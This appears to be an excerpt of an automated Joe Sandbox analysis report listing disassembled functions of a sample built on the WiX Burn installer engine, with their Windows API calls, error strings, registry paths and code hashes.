                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1659193697-948137518
                                                                                                                                                                                                                                                                            • Opcode ID: 4d00f19b1cef2f2c4b6112d91da0dbc07fa0a69a68f84df8c4f524de8f2eaf76
                                                                                                                                                                                                                                                                            • Instruction ID: 2c280f076033da973c52b19c00f8eb527e806aadc767d0d25b63ea2d8b533829
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d00f19b1cef2f2c4b6112d91da0dbc07fa0a69a68f84df8c4f524de8f2eaf76
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4316972A8176877DB26E2968C4BFDF3A6CEB13F55F100101FE40FA0C1D6B0AE409292
                                                                                                                                                                                                                                                                            Function 0092A271 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 0092A390
                                                                                                                                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 0092A49E
                                                                                                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0092A5F0
                                                                                                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 0092A60B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                            • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                                            • Opcode ID: bc410cf9cce408ce941ccb594de97a4edb2532e38cdc23d31e69681d98242b9e
                                                                                                                                                                                                                                                                            • Instruction ID: 9fa47c07ec3f4ad77a4965da452dda988468eb4ea14f6e5ea233239d0ea83b41
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc410cf9cce408ce941ccb594de97a4edb2532e38cdc23d31e69681d98242b9e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EEB17872800229EFCF15DFA4E881AAEBBB9BF54310F14445AF8056B21AD735DA51CF92
                                                                                                                                                                                                                                                                            Function 0091840B Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 245COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000000,0094E860,000000FF,00000000,000000FF,00000000,00000000,?,008E6CF2,00000000), ref: 00918482
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\mspengine.cpp, xrefs: 00918541
                                                                                                                                                                                                                                                                            • Failed to copy target product code., xrefs: 009185AD
                                                                                                                                                                                                                                                                            • Failed to grow array of ordered patches., xrefs: 0091864E
                                                                                                                                                                                                                                                                            • Failed to plan action for target product., xrefs: 0091852F
                                                                                                                                                                                                                                                                            • Failed to insert execute action., xrefs: 009184E7
                                                                                                                                                                                                                                                                            • Failed to get msp ui options., xrefs: 009185F5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to copy target product code.$Failed to get msp ui options.$Failed to grow array of ordered patches.$Failed to insert execute action.$Failed to plan action for target product.$d:\a\wix4\wix4\src\burn\engine\mspengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-3199010431
                                                                                                                                                                                                                                                                            • Opcode ID: bd89191e4ff89e471ecd381be8faf4473329d89b48b126c4b6549db26ab8d7b7
                                                                                                                                                                                                                                                                            • Instruction ID: 914fb886b76334033d57c77f3555145298e5045f0efc103ac68c01192aa4e43a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd89191e4ff89e471ecd381be8faf4473329d89b48b126c4b6549db26ab8d7b7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49A12975B04209EFCB15CF54C985EAAB7B9EF08314F1541A9E905AB392DB70EE80DB90
                                                                                                                                                                                                                                                                            Function 008EC5DE Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 152COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000001,00000000,?,00000000,?,7FFFFFFF,00000000,00000001,7FFFFFFF,00000000,00000009,00000000,feclient.dll,?), ref: 008EC6C7
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000001,00000000,?,00000000,?,7FFFFFFF,00000000,00000001,7FFFFFFF,00000000,00000009,00000000,feclient.dll,?), ref: 008EC72F
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000001,00000000,?,00000000,?,7FFFFFFF,00000000,00000001,7FFFFFFF,00000000,00000009,00000000,feclient.dll,?), ref: 008EC763
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to get length of left string: %ls$Failed to get length of right string: %ls$d:\a\wix4\wix4\src\burn\engine\condition.cpp$feclient.dll
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-1973728300
                                                                                                                                                                                                                                                                            • Opcode ID: cebb9cbe8a90e25e8db59587716684e570d3370336cf61eab5214142bb04a5fb
                                                                                                                                                                                                                                                                            • Instruction ID: bbfedd7953d15c2fe1d8726a2675846e05115afa36beac35a8dcf2635c627f3e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cebb9cbe8a90e25e8db59587716684e570d3370336cf61eab5214142bb04a5fb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4451CC36D00199BBCF128EAECC45EAE77B9FB1A314F114025FD65E7260C3709E529BA1
                                                                                                                                                                                                                                                                            Function 0094546B Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 135registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00944F04: lstrlenW.KERNEL32(008E7162,008E6DEA,?,?,?,00945488,008E7162,008E6DEA,008E6EC2,008E6DEA,008E6DEA,?,?,?,00900D28,0D8C6817), ref: 00944F2A
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(008E6EDE,008E6DEA,008E6DEA,00020019,008E6EDE,008E7162,008E6DEA,008E6EC2,008E6DEA,008E6DEA,?,?,?,00900D28,0D8C6817,8B000137), ref: 009455BC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get the id for the dependency "%ls"., xrefs: 00945521
                                                                                                                                                                                                                                                                            • Failed to allocate the registry key for dependency "%ls"., xrefs: 0094548F
                                                                                                                                                                                                                                                                            • Failed to open the registry key for the dependency "%ls"., xrefs: 009454D8
                                                                                                                                                                                                                                                                            • Failed to get the version for the dependency "%ls"., xrefs: 0094559B
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 009455A7
                                                                                                                                                                                                                                                                            • Failed to get the name for the dependency "%ls"., xrefs: 0094555E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Closelstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate the registry key for dependency "%ls".$Failed to get the id for the dependency "%ls".$Failed to get the name for the dependency "%ls".$Failed to get the version for the dependency "%ls".$Failed to open the registry key for the dependency "%ls".$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3903209405-4075874421
                                                                                                                                                                                                                                                                            • Opcode ID: f8705b5f27c2e881fa38cee091a5c4a0c3b0632299770c481e1907782ae5b94d
                                                                                                                                                                                                                                                                            • Instruction ID: 5b4d720ac09a96ce190dfff885c60c5807dafc607d1a99d1778e71a4a36b921f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8705b5f27c2e881fa38cee091a5c4a0c3b0632299770c481e1907782ae5b94d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86412633E40A65F7DF316AD48C46FAF7E2A9B40720F174269BA007B192D2754E80DAD0
                                                                                                                                                                                                                                                                            Function 00943275 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MoveFileExW.KERNEL32(?,?,00000000,80004005,?,?,?,00943404,?,?,00000000,?,?,00000000), ref: 00943294
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,00943404,?,?,00000000,?,?,00000000,?,?,008FC66A,?,?,00000001), ref: 009432A3
                                                                                                                                                                                                                                                                              • Part of subcall function 0094343B: FindFirstFileW.KERNEL32(008E6DEA,?,008E6DEA,008E6DEA,00000000), ref: 00943476
                                                                                                                                                                                                                                                                              • Part of subcall function 0094343B: FindClose.KERNEL32(00000000), ref: 00943482
                                                                                                                                                                                                                                                                            • MoveFileExW.KERNEL32(?,?,00000000,?,00000000,?,?,00943404,?,?,00000000,?,?,00000000), ref: 0094335E
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00943404,?,?,00000000,?,?,00000000,?,?,008FC66A,?,?,00000001,00000001), ref: 00943368
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$failed to create directory while moving file: '%ls' to: '%ls'$failed to move file: '%ls' to: '%ls'
                                                                                                                                                                                                                                                                            • API String ID: 3479031965-4053860161
                                                                                                                                                                                                                                                                            • Opcode ID: 23a91d0c52ea8d33043417e4fe048b61195a58a48c251991fcc59d47cd914244
                                                                                                                                                                                                                                                                            • Instruction ID: a2ddb30060efad30ef57f4c68166445862e1c7362af14a53154f874cc8c24118
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23a91d0c52ea8d33043417e4fe048b61195a58a48c251991fcc59d47cd914244
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F231E037640225B7EB215E758C01FAE766DAF92BA0F51C125FD14AB290DBB0CE0097D0
                                                                                                                                                                                                                                                                            Function 008F9996 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 121registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6CF2,00000000,00000000,00000001,00000000,00000000,00000390,000000F8,008E6CF2,009031C1,00000000,00000000,8D18C483,5350F845,00020006), ref: 008F9A73
                                                                                                                                                                                                                                                                              • Part of subcall function 008F7A4E: RegCloseKey.ADVAPI32(00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 008F7CDA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to update name and publisher., xrefs: 008F9ACB
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F9A10, 008F9A5D
                                                                                                                                                                                                                                                                            • Failed to update estimated size., xrefs: 008F9AFA
                                                                                                                                                                                                                                                                            • Failed to update resume mode., xrefs: 008F9A4B
                                                                                                                                                                                                                                                                            • Failed to open registration key., xrefs: 008F9A9B
                                                                                                                                                                                                                                                                            • Failed to delete registration key: %ls, xrefs: 008F99FE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to delete registration key: %ls$Failed to open registration key.$Failed to update estimated size.$Failed to update name and publisher.$Failed to update resume mode.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-4174111784
                                                                                                                                                                                                                                                                            • Opcode ID: 35bce05b1516294bf5b98ac436c763ef8b1bd0b22dd273f40ba855dc65501c78
                                                                                                                                                                                                                                                                            • Instruction ID: d7b850c354a90b51c0c8b8d574a920b79109132cc97eb75a3bb5dfcf9c41daea
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35bce05b1516294bf5b98ac436c763ef8b1bd0b22dd273f40ba855dc65501c78
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5231E332644629BBDF22AE758C06FBF7E25FB05B54F110100FB04F5090D7B29A60EB92
                                                                                                                                                                                                                                                                            Function 0090063D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to create the string dictionary., xrefs: 00900664
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 00900676, 009006C3, 00900760
                                                                                                                                                                                                                                                                            • ALL, xrefs: 00900702
                                                                                                                                                                                                                                                                            • Failed to check the dictionary of unique dependencies., xrefs: 009006B1
                                                                                                                                                                                                                                                                            • Failed to add "%ls" to the list of dependencies to ignore., xrefs: 0090074E
                                                                                                                                                                                                                                                                            • Failed to add "%ls" to the string dictionary., xrefs: 0090073A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: ALL$Failed to add "%ls" to the list of dependencies to ignore.$Failed to add "%ls" to the string dictionary.$Failed to check the dictionary of unique dependencies.$Failed to create the string dictionary.$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-461799926
                                                                                                                                                                                                                                                                            • Opcode ID: fab6e920a26003b321d858fa73cc1fc5aecd59da80b5916e97eea3dfc9c0ed5d
                                                                                                                                                                                                                                                                            • Instruction ID: ddee53d30ef70db5dad4d3b98a7e894dfcc40259b9f4e70e4c5484288735f901
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fab6e920a26003b321d858fa73cc1fc5aecd59da80b5916e97eea3dfc9c0ed5d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A31FDB1A85328BEDB21AA958C47F9F3968DBC1F65F100210FE01FA1C2E1F46D40D7A1
                                                                                                                                                                                                                                                                            Function 009102E1 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 111registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,-80000001,?,00020019,?,?,?,00000000,?,?,?,?,00910576,?,00000000,8000FFFF), ref: 00910415
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to read QuietUninstallString., xrefs: 009103ED
                                                                                                                                                                                                                                                                            • Failed to build full key path., xrefs: 0091034A
                                                                                                                                                                                                                                                                            • Failed to open registry key: %ls., xrefs: 0091039B
                                                                                                                                                                                                                                                                            • QuietUninstallString, xrefs: 009103C6
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 0091033A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\bundlepackageengine.cpp, xrefs: 009103AD, 009103FF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to build full key path.$Failed to open registry key: %ls.$Failed to read QuietUninstallString.$QuietUninstallString$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$d:\a\wix4\wix4\src\burn\engine\bundlepackageengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-1706903631
                                                                                                                                                                                                                                                                            • Opcode ID: 855dc126fc5c155280804cab59829234c829674cd82fcf6f3f6482be37101951
                                                                                                                                                                                                                                                                            • Instruction ID: b6b4983179249ad435f073ebd78125aae8d27ffe5f9362e896aae89e02ba5d65
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 855dc126fc5c155280804cab59829234c829674cd82fcf6f3f6482be37101951
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0314672B4031AFBDB219B948C42FDEBBA8EF44700F114129F955B6291E2F29DD09791
                                                                                                                                                                                                                                                                            Function 009473A0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 108registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp,0000011E,80070057,?,?,?), ref: 009474BC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: An invalid parameter was passed to the function.$Failed to locate and query bundle variable.$Failed to read string shared variable.$Reading bundle variable of type 0x%x not implemented.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp$variables
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-2641142750
                                                                                                                                                                                                                                                                            • Opcode ID: c18cd4f27affc30ccf30fc3e2523639eaeed7b4db0e042302a97e61e29509552
                                                                                                                                                                                                                                                                            • Instruction ID: 653ca7981cfbfa6b3b46c081fe01b51b3d06ed2c6d10b82648dba9eb0fb795f5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c18cd4f27affc30ccf30fc3e2523639eaeed7b4db0e042302a97e61e29509552
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0431D772E4821CBBCB219DD98C49FBFFF6EEB41754F018169BA08B6191D3758E10D6A0
                                                                                                                                                                                                                                                                            Function 008E5810 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,?,?,008E1CD0,?,00000105,00000000,?,00000000,?,?), ref: 008E5832
                                                                                                                                                                                                                                                                            • HeapReAlloc.KERNEL32(00000000,?,008E1CD0,?,00000105,00000000,?,00000000,?,?,?,?,008E29D8,?,?,00000000), ref: 008E5839
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
